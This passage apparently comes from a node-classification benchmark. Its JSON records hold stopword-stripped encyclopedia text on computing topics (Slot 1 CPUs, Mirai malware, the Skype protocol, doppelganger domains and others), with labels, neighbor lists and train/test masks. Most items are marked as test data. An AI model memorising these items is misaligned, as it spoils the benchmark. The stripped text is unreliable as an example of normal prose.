symmetric multiprocessing smp maximum two pentium ii pentium iii cpus used dual slot motherboard celeron official smp support also converter cards known slotkets hold socket 8 pentium pro cpu used slot 1 motherboards specific converters however rare another kind slotket allows using socket 370 cpu slot 1 many latter devices equipped voltage regulator modules order supply new cpu lower core voltage motherboard would otherwise allow single edge contact cartridge secc used beginning slot 1-era pentium ii cpus inside cartridge cpu enclosed hybrid plastic metal case back housing plastic several markings name pentium ii intel logo hologram model number front consists black anodized aluminum plate used hold cpu cooler secc form solid cpu resting safely inside case compared socket-based cpus pins bent cpu less likely damaged improper installation cooler following secc sepp-form single edge processor package appeared market designed lower-priced celeron cpus form lacks case entirely consisting solely printed-circuit board holding components form factor called secc2 used late pentium ii pentium iii cpus slot 1 created accommodate switch flip chip packaging front plate carried coolers mounted straight pcb exposed cpu die incompatible secc cartridges historically three platforms intel p6-cpus socket 8 slot 1 socket 370 slot 1 successor socket 8 socket 8 cpus pentium pro directly l2-cache embedded cpu located outside core circuit board shared core exception later slot 1 cpus coppermine core l2-cache embedded die beginning 2000 pentium-iii-cpus fc-pga-housing appeared slot 1 slowly succeeded socket 370 intel already offered socket 370 slot 1 time since beginning 1999 socket 370 initially made low-cost celeron processors slot 1 thought platform expensive pentium ii early pentium iii models cache core embedded die slot 1 also obsoleted old socket 7 least regarding intel standard platform home-user superseding intel p5 pentium mmx cpu intel completely left socket 7 market",
    "neighbors": [
      3588,
      5901,
      5523,
      8851,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      799,
      6175,
      7712,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7744,
      7105,
      4805,
      7110,
      3530,
      3403,
      4427,
      8394,
      4179,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      8442,
      1260,
      1005,
      4717,
      10225,
      371,
      3317,
      9592,
      3194
    ],
    "mask": "Test"
  },
  {
    "node_id": 3799,
    "label": 2,
    "text": "Calf_Studio_Gear:calf studio gear calf studio gear often referred calf plugins set open source lv2 plugins linux platform suite intends complete set plugins audio mixing virtual instruments mastering version 0.90.0 47 plugins suite calf studio gear development started late 2007 lv2 plugin standard infancy calf studio gear one first projects bring graphical audio plugins linux first versions 0.0.19 included support ladspa dssi well dropped december 2011 project initiated krzysztof foltman 2009 markus schmidt became interested development plugin suite due frustration proprietary software driving force behind plugins ever since responsible overall design calf studio gear well brains behind dsp many plugins calf studio gear complete suite plugins linux included plugins past calf plugins known cause crashes within ardour digital audio workstation primarily due use fftw library recently thread safe since october 2014 calf studio gear moved away using fftw library released version 0.0.60 may 2015",
    "neighbors": [
      596,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3800,
    "label": 4,
    "text": "CloudBerry_Backup:cloudberry backup cloudberry backup online backup software developed cloudberry lab software integrated 3rd-party cloud storage providers supports data backup restore windows desktop servers macos linux additionally offers support microsoft sql server microsoft exchange vmware hyper-v office 365 g suite google apps cloudberry backup available several licensed editions well free offering cloudberry backup desktop free licensed versions cloudberry managed backup saas solution designed help manage backup recovery across multiple computers servers cloudberry backup designed automate backup recovery files folders system images storage-agnostic meaning storage decoupled backup license customers work directly cloud storage providers pricing features need cloudberry backup supports 20 cloud storage providers including amazon s3 amazon glacier microsoft azure google cloud platform backblaze b2 wasabi openstack s3 compatible others cloudberry backup supports multiple data storage tiers including lower cost options like microsoft azure cool blob storage archive blob storage amazon s3 infrequent access glacier google cloud storage nearline coldline 2011 cloudberry backup released support amazon s3 subsequently updated support microsoft azure google cloud platform number cloud vendors late 2011 cloudberry lab released windows server edition followed support microsoft sql server microsoft exchange bare metal restore cloudberry backup added additional operating system support linux macos 2015 freeware version cloudberry backup also appeared year cloudberry backup written primarily c c++ programming languages windows versions also rely .net cloudberry managed backup built using c asp.net angular node.js cloudberry backup provides backup recovery functionality cloud local storage network shares backup recovery plans configured using graphical user interface command-line interface also available editions cloudberry backup supported operating systems windows macos linux cloudberry lab developed proprietary block-level algorithm speeds data uploads backups cloud addition company uses proprietary image-based algorithm back complete systems image files retaining ability recover specific files within images desired cloudberry backup supports recovery images directly cloud-based virtual server services amazon ec2 azure virtual machines google compute engine well bare-metal devices product restore system images computers operating system installed using bootable usb iso disk images cloudberry backup software supports synthetic full backup functionality amazon s3 wasabi hot storage performing typical incremental backup sequence advised perform full backups time time time resource consuming reduce bandwidth amount data uploaded synthetic full backup feature software scans data previously backed storage uploads new modified blocks instead full set files according cloudberry lab tests synthetic full backups 80 percent faster typical full image-based backup cloudberry backup perform backups microsoft sql server microsoft exchange databases recover active running state linux cloudberry backup allows users back files folders cloud storage product supports variety linux distributions including ubuntu debian suse red hat fedora centos oracle linux amazon linux cloudberry backup configured perform complete backup file directory disk image also supports incremental backup functionality block level meaning users able back new updated portions files initial backup completed backups executed manually via custom schedules cloudberry backup supports file compression 256-bit aes encryption server-side encryption encryption-at-rest cloud storage support filename encryption also available cloudberry backup provides flexible data recovery options backups restored physical virtual cloud virtual machines product restore files backup recover selected individual files product includes recovery wizard guides users data restoration process cloudberry lab features also include cloudberry backup available several editions designed address different use cases windows desktop edition intended file image-based backups whereas windows server microsoft exchange microsoft sql server ultimate editions designed meet needs businesses running windows server macos linux editions address backup needs platforms pricing cloudberry lab products based one-time purchase fee purchasers pay one-time fee computer server devices want operate cloudberry lab pricing per device per user license purchased device limit number users accounts operate product device long use product free versions cloudberry backup available personal use well cloudberry managed backup saas solution designed managed service providers msps businesses need way centrally manage backup customers within environments hosted saas solution provides means manage monitor large environments single dashboard cloudberry managed backup uses subscription-based licensing model supports white-labeling rebranded managed service providers sell backup service brand cloudberry managed backup integrated autotask connectwise optitune office 365 google g suite ninjarmm cloudberry backup received several awards including latest silver stevie award 2018 product constantly ranked one market leaders g2 crowd updates rankings every three months cloudberry lab developer cloudberry backup gold winner smb product year category best biz awards 2018 international addition awards cloudberry lab holds partnerships certifications microsoft vmware google cloud connectwise oracle openstack amazon web services",
    "neighbors": [
      5504,
      7905,
      11201,
      6565,
      3366,
      11178,
      5612,
      3629,
      1358,
      1935,
      7983,
      3573,
      11030,
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 3801,
    "label": 7,
    "text": "Kerrighed:kerrighed kerrighed open source single-system image ssi cluster software project project started october 1998 paris research group french national institute research computer science control 2006 2011 project mainly developed kerlabs january 2012 linux clustering mission kerlabs adopted new company cluster inc. headquartered pacific grove california january 18 2012 kerrighed 3.0 ported ubuntu 12.04 linux kernel v3.2 kerrighed implemented extension linux operating system helps scientific applications numerical simulations use power applications may using openmp message passing interface and/or posix multithreaded programming model kerrighed implements set global resource management services aim making resource distribution transparent applications managing resource sharing applications taking benefit whole cluster resources demanding applications kerrighed provides development framework allowing easily implement dynamic scheduling policies without kernel modification kerrighed provides several features distributed shared memory sequential consistency model processes migration one cluster node another limited extent checkpointing kerrighed introduces container concept entity abstraction files memory kerrighed node starts 'root container local resources available access resources globally one must start kerrighed container one node add nodes kerrighed container",
    "neighbors": [
      8992,
      7812,
      330,
      118,
      823,
      2264,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 3802,
    "label": 2,
    "text": "Daniel_Robbins_(computer_programmer):daniel robbins computer programmer daniel robbins computer programmer consultant best known founder former chief architect gentoo linux project 2008 launched funtoo project free linux distribution based gentoo became project lead hacker organizer also currently works time albuquerque new mexico 'open source/community strategy lead zenoss president funtoo technologies time system administrator university new mexico albuquerque robbins formed distribution enoch linux later renamed gentoo 2002 however like many free software projects gentoo struggled create business model would support key developers robbins resigned chief architect 26 april 2004 citing considerable personal debt desire spend time family formed gentoo foundation transferred gentoo intellectual property gentoo run full community-based model rejoin project short time august 2006 becoming developer february 2007 joining amd64 team resigned early march 2007 several high-profile criticisms way gentoo run since robbins left ... since resignation gentoo founder benevolent dictator project 2004 newly established gentoo foundation battling lack clear directions frequent developer conflicts ... mid-july 2007 emerged robbins still technically legal president gentoo foundation ... would like see fun gentoo lot less politics apparent role president gentoo foundation may opportunity change things better need look ... 2008 robbins began work funtoo project created allow work extending technologies originally created gentoo robbins move microsoft may 2005 attracted attention within linux community historically combative relationship microsoft described role working bill hilf ... helping microsoft understand open source community-based projects ... however robbins resigned less year later 16 january 2006 due frustrations unable fully utilize technical skills position later 2006 joined fsmlabs socorro new mexico work rtlinux daniel robbins also president funtoo technologies consulting firm founded 2006 located albuquerque new mexico",
    "neighbors": [
      1026,
      515,
      7812,
      7938,
      8326,
      4360,
      5644,
      4493,
      4367,
      8848,
      657,
      10642,
      1939,
      2195,
      1813,
      2581,
      2199,
      3478,
      6808,
      7450,
      11155,
      10780,
      1694,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      6947,
      8354,
      4011,
      5931,
      8364,
      9646,
      819,
      1717,
      823,
      9660,
      2109,
      11069,
      10687,
      10817,
      10822,
      8263,
      843,
      5067,
      589,
      6352,
      4177,
      11602,
      8147,
      8787,
      4437,
      6489,
      4831,
      9696,
      1761,
      11232,
      7907,
      4841,
      7793,
      1394,
      1396,
      3189,
      11643,
      9342
    ],
    "mask": "Test"
  },
  {
    "node_id": 3803,
    "label": 2,
    "text": "Leaf_driver:leaf driver leaf driver refers device driver accesses logically physically existent devices i/o bus implements functions defined device transferring data device accessing device registers leaf devices requiring leaf drivers typical peripheral devices disks tapes network adapters framebuffer forth drivers devices export traditional character block driver interfaces use user processes read write data storage communication devices see also nexus driver",
    "neighbors": [
      3842,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3804,
    "label": 6,
    "text": "Shar:shar unix operating system shar abbreviation shell archive archive format created unix shar utility shar file type self-extracting archive valid shell script executing recreate files extract files standard unix bourne shell sh usually required note shar command specified single unix specification formally component unix legacy utility shar format advantage plain text poses risk due executable reason older general tar file format usually preferred even transferring text files gnu provides version shar gnu sharutils collection unshar programs written operating systems always reliable shar files shell scripts theoretically anything shell script including using incompatible features enhanced workalike shells limiting utility outside unix world drawback self-extracting shell scripts kind shar rely particular implementation programs shell archives created older versions makeself example original unreal tournament linux installer fails run bash 3.x due change missing arguments codice_1 built-in command handled james gosling generally credited writing first version shar utility also wrote early example concept form simple shell script version concept vms operating system written 1987 michael bednarek melbourne institute applied economic social research dcl script vms_shar.com later maintained extended james gray xerox andy harper king college london",
    "neighbors": [
      9988,
      10387,
      1940,
      3222,
      3350,
      3114,
      7983,
      2095,
      4406,
      823,
      10817,
      2755,
      11076,
      3659,
      10317,
      4174,
      4561,
      722,
      2389,
      5096,
      10857,
      8940,
      237,
      4845,
      4850,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 3805,
    "label": 4,
    "text": "Convergence_(SSL):convergence ssl convergence proposed strategy replacing ssl certificate authorities first put forth moxie marlinspike august 2011 giving talk titled ssl future authenticity black hat security conference demonstrated firefox addon server-side notary daemon talk marlinspike proposed current problems certificate authority ca system could reduced single missing property called trust agility convergence aimed provide strategy claimed agile secure distributed 2013 marlinspike focused ietf proposal called tack designed uncontroversial first step advocates dynamic certificate pinning instead full ca replacement reduces number times third party needs trusted development convergence continued convergence extra fork 2014 convergence based previous work perspectives project carnegie mellon university like perspectives convergence authenticated connections contacting external notaries unlike perspectives convergence notaries could use number different strategies beyond network perspective order reach verdict purpose certificate authority conventional ssl system vouch identity site checking ssl certificate without vouchsafing one open man-in-the-middle attack single site vouched single certificate authority ca ca trusted user web browsers typically include list default trusted certificate authorities display warning untrusted connection site vouchsafed trusted ca problem system user browser vendor loses trust ca removing ca browser list trusted authorities means losing trust sites used ca happened major browsers lost trust diginotar ca sites registered ca get new certificate authorities see certificate authority ca compromise examples trust breaches convergence however level redundancy single point failure several notaries could vouch single site user could choose trust several notaries would vouch sites notaries disagreed whether site identity correct user could choose go majority vote err side caution demand notaries agree content single notary voting method controlled setting browser addon user chose distrust certain notary non-malicious site could still trusted long remaining trusted notaries trusted thus longer single point failure september 2011 qualys announced would run two notary servers june 2016 servers appeared list notaries maintained convergence wiki",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      9744,
      1683,
      1688,
      3742,
      2083,
      8358,
      11693,
      7983,
      11569,
      9394,
      7736,
      9281,
      9412,
      9285,
      3657,
      5834,
      10831,
      11345,
      5590,
      474,
      8283,
      4063,
      7264,
      8674,
      2275,
      7139,
      10341,
      1907,
      5107,
      501,
      1526,
      503,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 3806,
    "label": 3,
    "text": "Milk_Race_(video_game):milk race video game milk race computer game released 1987 zx spectrum commodore 64 atari 8-bit family msx amstrad cpc developed phil berry stuart ruecroft composer david whittaker icon design based around internationally acclaimed event world cycle race milk race known tour britain simulator designed coincide 1987 event starting newcastle upon tyne north england midlands london finishing line basic premise game control bike using acceleration braking choosing correct gear conserve energy",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3807,
    "label": 4,
    "text": "Mirai_(malware):mirai malware mirai malware turns networked devices running linux remotely controlled bots used part botnet large-scale network attacks primarily targets online consumer devices ip cameras home routers mirai botnet first found august 2016 malwaremustdie whitehat malware research group used largest disruptive distributed denial service ddos attacks including attack 20 september 2016 computer security journalist brian krebs web site attack french web host ovh october 2016 dyn cyberattack according chat log anna-senpai robert coelho mirai named 2011 tv anime series mirai nikki source code mirai published hack forums open-source since source code published techniques adapted malware projects devices infected mirai continuously scan internet ip address internet things iot devices mirai includes table ip address ranges infect including private networks addresses allocated united states postal service department defense mirai identifies vulnerable iot devices using table 60 common factory default usernames passwords logs infect mirai malware infected devices continue function normally except occasional sluggishness increased use bandwidth device remains infected rebooted may involve simply turning device short wait turning back reboot unless login password changed immediately device reinfected within minutes upon infection mirai identify competing malware remove memory block remote administration ports victim iot devices identified “ first entering rapid scanning phase ① asynchronously “ statelessly ” sent tcp syn probes pseudo-random ipv4 addresses excluding hard-coded ip blacklist telnet tcp ports 23 2323 ” iot device responds probe attack enters brute-force login phase phase attacker tries establish telnet connection using predetermined username password pairs list credentials logins default usernames passwords iot vendor iot device allows telnet access victim ip along successfully used credential sent collection server hundreds thousands iot devices use default settings making vulnerable infection infected device monitor command control server indicates target attack reason use large number iot devices bypass anti-dos software monitors ip address incoming requests filters sets block identifies abnormal traffic pattern example many requests come particular ip address reasons include able marshall bandwidth perpetrator assemble alone avoid traced mirai internet things iot devices threat stopped arrest actors since actors utilizing mirai malware source code openly shared github use evolve mirai new variants expand botnet node networking previously untouched iot devices detail recent progress variants listed following paragraphs 12 december 2017 researchers identified variant mirai exploiting zero-day flaw huawei hg532 routers accelerate mirai botnets infection implementing two known soap related exploits routers web interface cve-2014–8361 cve-2017–17215 mirai version called satori 14 january 2018 new variant mirai dubbed “ okiru ” already targeting popular embedded processor like arm mips x86 powerpc others found targeting arc processors based linux devices first time argonaut risc core processor shorted arc processors second-most-popular embedded 32 bit processor shipped 1.5 billion products per year including desktop computers servers radio cameras mobile utility meters televisions flash drives automotive networking devices smart hubs tv modems routers wifi internet things noted however relatively small number arc-based devices run linux therefore exposed mirai 18 january 2018 successor mirai reported designed hijack cryptocurrency mining operations 26 january 2018 two similar mirai variant botnets reported modified version weaponizes edb 38722 d-link router exploit enlist vulnerable iot devices vulnerability router home network administration protocol hnap utilized craft malicious query exploited routers bypass authentication cause arbitrary remote code execution less modified version mirai called masuta japanese transliteration master modified version called puremasuta march 2018 new variant mirai dubbed omg emerged surface added configurations target vulnerable iot devices turning proxy servers new firewall rules allow traffic travel generated http socks ports added configurations mirai code ports open traffic omg sets 3proxy – open-source software available russian website may june 2018 another variant mirai dubbed wicked emerged added configurations target least three additional exploits including affecting netgear routers cctv-dvrs wicked scans ports 8080 8443 80 81 attempts locate vulnerable unpatched iot devices running ports researchers suspect author created wicked sora owari omni botnets early july 2018 reported least thirteen versions mirai malware detected actively infecting linux internet things iot internet three designed target specific vulnerabilities using exploit proof concept without launching brute-forcing attack default credential authentication month published report infection campaign mirai malware android devices android debug bridge tcp/5555 actually optional feature android operating system discovered feature appears enabled android phones end 2018 mirai variant dubbed miori started spread remote code execution vulnerability thinkphp framework affecting versions 5.0.23 5.1.31 vulnerability continuously abused evolved mirai variants dubbed hakai yowai january 2019 variant speakup february 2019 mirai used alongside bashlite ddos attack 20 september 2016 krebs security site reached 620 gbit/s ars technica also reported 1 tbit/s attack french web host ovh 21 october 2016 multiple major ddos attacks dns services dns service provider dyn occurred using mirai malware installed large number iot devices many still using default usernames passwords attacks resulted inaccessibility several high-profile websites including github twitter reddit netflix airbnb many others attribution dyn attack mirai botnet originally reported level 3 communications mirai later revealed used ddos attacks rutgers university 2014 2016 left faculty students campus unable access outside internet several days time additionally failure university central authentication service caused course registration services unavailable critical times academic semester university reportedly spent 300,000 consultation increased cyber-security budget university 1 million response attacks university cited attacks among reasons increase tuition fees 2015-2016 school year person alias exfocus claimed responsibility attacks stating reddit ama /r/rutgers subreddit user student school ddos attacks motivated frustrations university bus system user later claimed interview new jersey-based blogger lied affiliated university attacks funded anonymous client security researcher brian krebs later alleged user indeed student rutgers university latter interview given attempt distract investigators staff deep learning security observed steady growth mirai botnets 21 october attack mirai also used attack liberia internet infrastructure november 2016 according computer security expert kevin beaumont attack appears originated actor also attacked dyn security affairs website taken offline hour twenty minutes published article mirai okiru 14 january 2018 end november 2016 approximately 900,000 routers deutsche telekom produced arcadyan crashed due failed tr-064 exploitation attempts variant mirai resulted internet connectivity problems users devices talktalk later patched routers new variant mirai discovered talktalk routers british man suspected behind attack arrested luton airport according bbc january 17 2017 computer security journalist brian krebs posted article blog krebs security disclosed name person believed written malware krebs stated likely real-life identity anna-senpai named anna nishikinomiya character shimoneta author mirai actually paras jha owner ddos mitigation service company protraf solutions student rutgers university update original article paras jha responded krebs denied written mirai fbi reported questioned jha involvement october 2016 dyn cyberattack december 13 2017 paras jha josiah white dalton norman entered guilty plea crimes related mirai botnet daniel kaye 29 also known alias bestbuy popopret spiderman accused using infected network computers known mirai botnet attack blackmail lloyds banking group barclays banks according nca extradited germany uk according report kaye also pleaded guilty court hijacking 900,000 routers network deutsche telekom researchers pointing handle name nexus zeta responsible author new variants mirai dubbed okiru satori masuta puremasuta august 21 2018 grand jury indicted kenneth currin schuchman 20 aka nexus zeta knowingly causing transmission program information code commands result conduct intentionally caused damage without authorization protected computers according indictment filed u.s. district court anchorage followed arrest trial suspect american electronic musician composer james ferraro 2018 album four pieces mirai references mirai ongoing narrative",
    "neighbors": [
      1024,
      3072,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      4648,
      46,
      10297,
      1087,
      1608,
      3657,
      8779,
      81,
      8789,
      4703,
      8288,
      8292,
      8805,
      10875,
      3711,
      8320,
      9855,
      5764,
      2187,
      3724,
      4240,
      1688,
      9371,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      10457,
      4314,
      9435,
      4830,
      5349,
      1254,
      10477,
      9460,
      7418,
      5886,
      2815,
      3843,
      10502,
      3347,
      4883,
      2325,
      278,
      10003,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      823,
      1337,
      11577,
      7996,
      11583,
      3395,
      6484,
      857,
      1882,
      7515,
      3423,
      8032,
      2409,
      4462,
      3956,
      9082,
      10110,
      9087,
      901,
      5000,
      4494,
      11152,
      10132,
      1435,
      9630,
      1440,
      5024,
      10657,
      5028,
      11175,
      4522,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      9154,
      8133,
      11221,
      4054,
      7639,
      8664,
      988,
      9181,
      1504,
      9186,
      2542,
      8176,
      9713,
      507,
      3581
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3808,
    "label": 0,
    "text": "Perplexity:perplexity information theory perplexity measurement well probability distribution probability model predicts sample may used compare probability models low perplexity indicates probability distribution good predicting sample perplexity discrete probability distribution p defined h p entropy bits distribution x ranges events base need 2 perplexity independent base provided entropy exponentiation use base measure also known domains order-1 true diversity perplexity random variable x may defined perplexity distribution possible values x special case p models fair k -sided die uniform distribution k discrete events perplexity k random variable perplexity k uncertainty fair k -sided die one said k -ways perplexed value random variable unless fair k -sided die k values possible overall uncertainty greater values probability greater 1/ k decreasing overall value summing perplexity sometimes used measure hard prediction problem always accurate two choices one probability 0.9 chances correct guess 90 percent using optimal strategy perplexity 2= 1.38 inverse perplexity case fair k-sided die represents probability guessing correctly 1/1.38 0.72 0.9 perplexity exponentiation entropy clearcut quantity entropy measure expected average number bits required encode outcome random variable using theoretical optimal variable-length code cf equivalently regarded expected information gain learning outcome random variable information measured bits model unknown probability distribution p may proposed based training sample drawn p given proposed probability model q one may evaluate q asking well predicts separate test sample x x ... x also drawn p perplexity model q defined formula_3 customarily 2 better models q unknown distribution p tend assign higher probabilities q x test events thus lower perplexity less surprised test sample exponent may regarded average number bits needed represent test event x one uses optimal code based q low-perplexity models better job compressing test sample requiring bits per test element average q x tends high exponent may also regarded cross-entropy formula_5 denotes empirical distribution test sample i.e. formula_6 x appeared n times test sample size n natural language processing perplexity way evaluating language models language model probability distribution entire sentences texts using definition perplexity probability model one might find example average sentence x test sample could coded 190 bits i.e. test sentences average log-probability -190 would give enormous model perplexity 2 per sentence however common normalize sentence length consider number bits per word thus test sample sentences comprised total 1,000 words could coded using total 7.95 bits per word one could report model perplexity 2 247 per word words model confused test data choose uniformly independently among 247 possibilities word lowest perplexity published brown corpus 1 million words american english varying topics genres 1992 indeed 247 per word corresponding cross-entropy log247 7.95 bits per word 1.75 bits per letter using trigram model often possible achieve lower perplexity specialized corpora predictable simply guessing next word brown corpus word accuracy 7 percent 1/247 0.4 percent naive use perplexity measure predictiveness might lead one believe guess based unigram statistics brown corpus trigram statistics yielded word perplexity 247 using trigram statistics would improve chances correct guess",
    "neighbors": [
      7780,
      3748,
      7599,
      6223,
      3998
    ],
    "mask": "None"
  },
  {
    "node_id": 3809,
    "label": 9,
    "text": "Variadic:variadic computer science operator function variadic take varying number arguments arity fixed specific articles see",
    "neighbors": [
      692,
      3733
    ],
    "mask": "Test"
  },
  {
    "node_id": 3810,
    "label": 4,
    "text": "Thermal_attack:thermal attack thermal attack aka thermal imaging attack approach exploits heat traces uncover entered credentials attacks rely phenomenon heat transfer one object another authentication heat transfers users hands surface interacting leaving heat traces behind analyzed using thermal cameras operate far-infrared spectrum traces recovered used reconstruct passwords cases attack successful even 30 seconds user authenticated thermal attacks performed victim authenticated alleviating need in-situ observation attacks e.g. shoulder surfing attacks affected hand occlusions smudge attacks reveal order entries graphical passwords android lock patterns thermal attacks reveal order entries even case pins alphanumeric passwords reason thermal attacks leak information order entry keys buttons user touches first lose heat time recently touched ones maintain heat signature longer time results distinguishable heat patterns tell attacker entry entered first thermal attacks shown effective plastic keypads ones used enter credit card pins supermarkets restaurants handheld mobile devices smartphones tablets paper published conference human factors computing systems chi 2017 abdelrahman et al showed attack feasible today smartphones also proposed ways mitigate attack swiping randomly screen distort heat traces forcing maximum cpu usage seconds",
    "neighbors": [
      7624
    ],
    "mask": "None"
  },
  {
    "node_id": 3811,
    "label": 0,
    "text": "Arabic_Ontology:arabic ontology arabic ontology linguistic ontology arabic language used arabic wordnet ontologically-clean content people use also tree i.e classification concepts/meanings arabic terms formal representation concepts arabic terms convey content ontologically well-founded benchmarked scientific advances rigorous knowledge sources rather speakers ’ naïve beliefs wordnets typically ontology tree explored online ontology structure i.e. data model similar wordnet structure concept ontology given unique concept identifier uri informally described gloss lexicalized one synonymous lemma terms term-concept pair called sense given senseid set senses called synset concepts senses described attributes era area specify used lexicalization type example sentence example instances ontological analysis others semantic relations e.g. subtypeof partof others defined concepts important individuals included ontology individual countries seas individuals given separate individualids linked concepts instanceof relation concepts arabic ontology mapped synsets wordnet well bfo dolce terms used arabic ontology mapped lemmas ldc sama database arabic ontology seen next generation wordnet ontologically-clean arabic wordnet follows structure i.e. data model wordnet fully mapped wordnet however critical foundational differences arabic ontology used many application domains urls arabic ontology designed according w3c best practices publishing linked data described following url schemes allows one also explore whole database like exploring graph",
    "neighbors": [
      416,
      2948,
      2414,
      10452,
      538,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3812,
    "label": 5,
    "text": "Skype_protocol:skype protocol skype protocol proprietary internet telephony network used skype protocol specifications made publicly available skype official applications using protocol closed-source skype network interoperable voice ip voip networks without proper licensing skype numerous attempts study and/or reverse engineer protocol undertaken reveal protocol investigate security allow unofficial clients june 20 2014 microsoft announced deprecation old skype protocol within several months date order continue using skype services skype users update skype applications released 2014 users able log older skype versions clients announcement made whether smarttv hardware phones built-in skype functionality continue work without interruptions new skype protocol—microsoft notification protocol 24—promised better offline messaging better messages synchronization across skype devices deprecation became effective second week august 2014 skype first peer-to-peer ip telephony network network contains three types entities supernodes ordinary nodes login server client maintains host cache ip address port numbers reachable supernodes skype user directory decentralized distributed among supernodes network supernodes grouped slots 9–10 supernodes slots grouped blocks 8 slots previously client good bandwidth restrictions due firewall network address translation nat adequate processing power could become supernode placed extra burden connected internet without nat skype used computers internet connections third parties udp hole punching directly connect two clients behind nat completely relay users calls 2012 microsoft altered design network brought supernodes control hosted servers data centres microsoft time defended move saying believe approach immediate performance scalability availability benefits hundreds millions users make skype community time concern regarding privacy implications change appear proven true revelation prism surveillance program june 2013 skype support use ipv6 protocol would greatly reduce complexity associated aforementioned ipv4 communication structure supernodes relay communications behalf two clients behind firewalls one-to-many network address translation without relaying supernodes two clients firewall nat difficulties would unable make receive calls one another skype tries get two ends negotiate connection details directly sometimes sum problems ends prevent direct conversation established problems firewalls nat signaling encrypted using rc4 however method obfuscates traffic key recovered packet voice data encrypted aes skype client application programming interface api opens network software developers skype api allows programs use skype network get white pages information manage calls skype code closed source protocol standardized parts client use internet direct indy open source socket communication library july 8 2012 researcher benin ouanilo medegan released articles proof concept code results reverse engineering skype client many networking security companies claim detect control skype protocol enterprise carrier applications specific detection methods used companies often proprietary pearson chi-squared test stochastic characterization naive bayes classifiers two approaches published 2007 rc4 encryption algorithm used obfuscate payload datagrams xor two 32-bit values transformed 80-byte rc4 key using unknown key engine notable misuse rc4 skype found tcp streams udp unaffected first 14 bytes 10 known user since consist hash username password xor-ed rc4 stream cipher reinitialized encrypt rest tcp stream tcp packets skype init tcp packet contains almost traffic ciphered command parameters appended object list object list compressed object number string ip port even another object list object id id identifies command parameter object packets compressed algorithm variation arithmetic compression uses reals instead bits reverse engineering skype protocol inspecting/disassembling binaries prohibited terms conditions skype license agreement however european union law allows reverse-engineering computer program without getting permission author inter-operability purposes united states digital millennium copyright act provides protections reverse engineering software purposes interoperability software also legal precedents united states reverse-engineering aimed interoperability file formats protocols addition countries specifically permit program copied purposes reverse engineering",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      1036,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      1962,
      9519,
      8758,
      3770,
      1467,
      10173,
      6208,
      8640,
      1218,
      6982,
      6855,
      2760,
      6344,
      1738,
      2892,
      3284,
      4318,
      5470,
      4068,
      6628,
      9572,
      3959,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 3813,
    "label": 5,
    "text": "Micro_Transport_Protocol:micro transport protocol micro transport protocol µtp sometimes also utp open udp-based variant bittorrent peer-to-peer file sharing protocol intended mitigate poor latency congestion control problems found conventional bittorrent tcp providing reliable ordered delivery devised automatically slow rate packets data transmitted users peer-to-peer file sharing torrents interferes applications example protocol automatically allow sharing adsl line bittorrent application web browser µtp emerged research internet2 qos high-performance bulk transport adapted use background transport protocol plicto founded stanislav shalunov later acquired bittorrent inc. 2006 developed within new owner first introduced µtorrent 1.8.x beta branches publicized alpha builds µtorrent 1.9 implementation µtp used µtorrent later separated libutp library published mit license first free software client implement µtp ktorrent 4.0. libtorrent implements µtp since version 0.16.0 used qbittorrent since 2.8.0 tixati implements µtp since version 1.72 vuze formerly azureus implements µtp since version 4.6.0.0 transmission implements µtp since version 2.30 congestion control algorithm used µtp known low extra delay background transport ledbat aims decrease latency caused applications using protocol maximizing bandwidth latency excessive additionally information µtp congestion controller used choose transfer rate tcp connections ledbat described rfc 6817 2009 details µtp implementation different then-current internet draft µtp also adds support nat traversal using udp hole punching two port-restricted peers third unrestricted peer acts stun server",
    "neighbors": [
      1541,
      4229,
      4490,
      11029,
      3350,
      11413,
      10522,
      2075,
      5531,
      3366,
      10924,
      7214,
      11566,
      9909,
      3770,
      4797,
      3006,
      8640,
      11073,
      708,
      2887,
      6351,
      3792,
      6991,
      7761,
      3676,
      5085,
      5472,
      609,
      3428,
      7017,
      7921,
      10995,
      1908,
      4725,
      5749,
      119,
      9332,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 3814,
    "label": 8,
    "text": "Doppelganger_domain:doppelganger domain doppelganger domain domain spelled identical legitimate fully qualified domain name fqdn missing dot host/subdomain domain used malicious purposes typosquatting traditional attack vector web distribute malware harvest credentials vectors email remote access services ssh rdp vpn also leveraged whitepaper godai group doppelganger domains demonstrated numerous emails harvested without anyone noticing someone email address someone finance.somecompany.example doppelganger domain would financesomecompany.example hence someone trying send email user forget dot finance someone financesomecompany.example would go doppelganger domain instead legitimate user",
    "neighbors": [
      7515,
      10103,
      2887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3815,
    "label": 2,
